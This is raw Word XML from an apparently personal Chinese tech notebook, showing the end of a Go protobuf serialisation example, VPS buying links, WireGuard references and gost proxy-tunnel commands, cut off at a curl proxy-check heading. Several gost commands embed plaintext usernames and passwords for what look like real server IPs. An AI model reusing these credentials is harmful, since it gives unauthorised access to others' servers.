    <w:p w14:paraId="52E4BECA" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>s2.Cn=ClassName_class3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7831D0" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ss.Person=append(ss.Person,s2)//</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>将第二个学生信息添加到</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>Students</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>对应的切片中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BB7A8" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>ss.School="cqu"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34615943" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("Students</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>信息为：</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",ss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AA1FC8" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A91F73A" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>// Marshal takes a protocol buffer message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC62F0F" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>// and encodes it into the wire format, returning the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0814C3" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>buffer, _ := proto.Marshal(ss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13114D2B" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>序列化之后的信息为：</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",buffer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CA134F" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>Use UnmarshalMerge to preserve and append to existing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78538960" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>data:=&amp;Students{}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA1340" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>proto.Unmarshal(buffer,data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E513CF7" w14:textId="77777777" w:rsidR="008F76A7" w:rsidRPr="008F76A7" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>反序列化之后的信息为：</w:t>
      </w:r>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>",data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C842015" w14:textId="4B1C0EAF" w:rsidR="00DC6177" w:rsidRDefault="008F76A7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008F76A7">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F86BE3" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF21121" w14:textId="49BDD79A" w:rsidR="000907C7" w:rsidRDefault="000907C7" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc159779608"/>
      <w:r>
        <w:t>VPS购买</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
    </w:p>
    <w:p w14:paraId="19B015DA" w14:textId="77777777" w:rsidR="002658F0" w:rsidRDefault="002658F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F6AD7B9" w14:textId="08DA739F" w:rsidR="002658F0" w:rsidRPr="002658F0" w:rsidRDefault="002658F0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="148" w:name="_Toc159779609"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>racknerd</w:t>
      </w:r>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="318FD821" w14:textId="419C6245" w:rsidR="000907C7" w:rsidRDefault="002658F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002658F0">
        <w:t>https://p3terx.com/archives/cheap-vps-racknerd.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C63391" w14:textId="77777777" w:rsidR="000907C7" w:rsidRDefault="000907C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7908F014" w14:textId="77777777" w:rsidR="002658F0" w:rsidRDefault="002658F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F4DB3BC" w14:textId="1CDEBA0C" w:rsidR="002658F0" w:rsidRDefault="002658F0" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc159779610"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>腾讯云</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="7C37BCEC" w14:textId="7F04E1F7" w:rsidR="002658F0" w:rsidRDefault="002658F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002658F0">
        <w:t>https://cloud.tencent.com/act/pro/lighthouse2021?fromSource=gwzcw.1293314.1293314.1293314&amp;cps_key=42c9b322fd48ff0ce405a0c7d78612fd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF65A20" w14:textId="77777777" w:rsidR="000907C7" w:rsidRDefault="000907C7" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="262660E3" w14:textId="2516BE9E" w:rsidR="007E33D4" w:rsidRDefault="003A1DC3" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="150" w:name="_Toc159779611"/>
      <w:r>
        <w:t>网络代理、协议</w:t>
      </w:r>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="0C74EA44" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="060F6CCB" w14:textId="262FCD31" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc159779612"/>
      <w:r>
        <w:t>VPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:wireguard</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w14:paraId="18CD5A2D" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/WireGuard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19092D31" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>官网</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://www.wireguard.com/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10177729" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4328DF" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>wireguard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E83F010" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0019727F">
        <w:t>https://www.myfreax.com/how-to-set-up-wireguard-vpn-on-ubuntu-20-04/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D9C29" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="338CB5D6" w14:textId="77777777" w:rsidR="00FC1614" w:rsidRDefault="00FC1614" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEA5C5F" w14:textId="77777777" w:rsidR="00FC1614" w:rsidRDefault="00FC1614" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="077C9E99" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44271F86" w14:textId="77777777" w:rsidR="00515127" w:rsidRDefault="00515127" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BED16E3" w14:textId="47620804" w:rsidR="007E33D4" w:rsidRDefault="003F464D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="152" w:name="_Toc159779613"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>gost</w:t>
      </w:r>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w14:paraId="16DA6DCD" w14:textId="41F67232" w:rsidR="003F464D" w:rsidRDefault="00312600" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00312600">
        <w:t>https://github.com/ginuerzh/gost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B3C2C5" w14:textId="1C3B4B31" w:rsidR="00312600" w:rsidRDefault="00312600" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68A0D15A" w14:textId="773EEE46" w:rsidR="002F064E" w:rsidRPr="002F064E" w:rsidRDefault="002F064E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>只要本地客户端执行</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，就可以转发</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>socks</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>等协议的转发，但是实测我无法</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https</w:t>
      </w:r>
      <w:r w:rsidRPr="002F064E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>转发，会遇到证书的报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C05E5C" w14:textId="14DCAF9E" w:rsidR="00062B6E" w:rsidRDefault="005D35DF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54552451" w14:textId="0BD11F39" w:rsidR="00062B6E" w:rsidRDefault="00062B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> udp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>封装的协议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A787A0" w14:textId="64AB88E4" w:rsidR="00F211EE" w:rsidRDefault="00F211EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="007E59F1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56430308" w14:textId="296441C2" w:rsidR="00062B6E" w:rsidRDefault="001C31FB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="001C31FB">
        <w:t>gost -L kcp://gost:1qaz@WSX@45.77.115.252:52783</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EAABF0" w14:textId="0FE1CE14" w:rsidR="00062B6E" w:rsidRDefault="00F211EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>lient</w:t>
      </w:r>
      <w:r w:rsidR="007E59F1">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63656DF2" w14:textId="4537BEC5" w:rsidR="00F211EE" w:rsidRDefault="00F211EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="069E6DF3" w14:textId="77777777" w:rsidR="00F211EE" w:rsidRDefault="00F211EE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F1BC50C" w14:textId="7C491F1B" w:rsidR="00062B6E" w:rsidRDefault="00062B6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>wss</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D3E333" w14:textId="4168E124" w:rsidR="00312600" w:rsidRDefault="008C4ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5ADD6" w14:textId="7C5EB906" w:rsidR="00DD12D3" w:rsidRDefault="00DD12D3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>./gost -L mwss://</w:t>
      </w:r>
      <w:r w:rsidR="00D1380B" w:rsidRPr="008C4ADC">
        <w:t>fivecolorstone:fivecolorstone</w:t>
      </w:r>
      <w:r w:rsidR="00D1380B">
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD12D3">
        <w:t>192.210.137.99:29753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294ABB98" w14:textId="5C7A4E71" w:rsidR="00B709FF" w:rsidRDefault="00B709FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B709FF">
        <w:t>gost -L mwss://fivecolorstone:fivecolorstone@45.77.115.252:29723</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017D25B5" w14:textId="0C473F0D" w:rsidR="0052064B" w:rsidRDefault="0052064B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0052064B">
        <w:t>gost -L mwss://fivecolorstone:fivecolorstone@192.227.167.113:39753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4EA47" w14:textId="5F05A9E0" w:rsidR="008C4ADC" w:rsidRDefault="008C4ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>lient:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00565A5F" w14:textId="73BC6E37" w:rsidR="00DD12D3" w:rsidRDefault="008C4ADC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008C4ADC">
        <w:t>gost -L=:6666 -F=mwss://fivecolorstone:fivecolorstone@192.210.137.99:29753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9B7F01" w14:textId="425ECE5B" w:rsidR="00B709FF" w:rsidRDefault="00B709FF" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B709FF">
        <w:t xml:space="preserve">gost </w:t>
      </w:r>
      <w:r w:rsidRPr="008C4ADC">
        <w:t>-L=:6666 -F=</w:t>
      </w:r>
      <w:r w:rsidRPr="00B709FF">
        <w:t>mwss://fivecolorstone:fivecolorstone@45.77.115.252:29723</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66F95B" w14:textId="2C8E9BBE" w:rsidR="00DD12D3" w:rsidRDefault="0052064B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0052064B">
        <w:t xml:space="preserve">gost </w:t>
      </w:r>
      <w:r w:rsidR="0084586E" w:rsidRPr="008C4ADC">
        <w:t>-L=:6666 -F</w:t>
      </w:r>
      <w:r w:rsidRPr="0052064B">
        <w:t xml:space="preserve"> mwss://fivecolorstone:fivecolorstone@192.227.167.113:39753</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3890FCC1" w14:textId="77777777" w:rsidR="00381B01" w:rsidRDefault="00381B01" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D18296" w14:textId="36E04359" w:rsidR="00381B01" w:rsidRDefault="00381B01" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="153" w:name="_Toc159779614"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>挂代理检测</w:t>
      </w:r>
      <w:bookmarkEnd w:id="153"/>
      <w:r w:rsidR="00804236">
        <w:rPr>
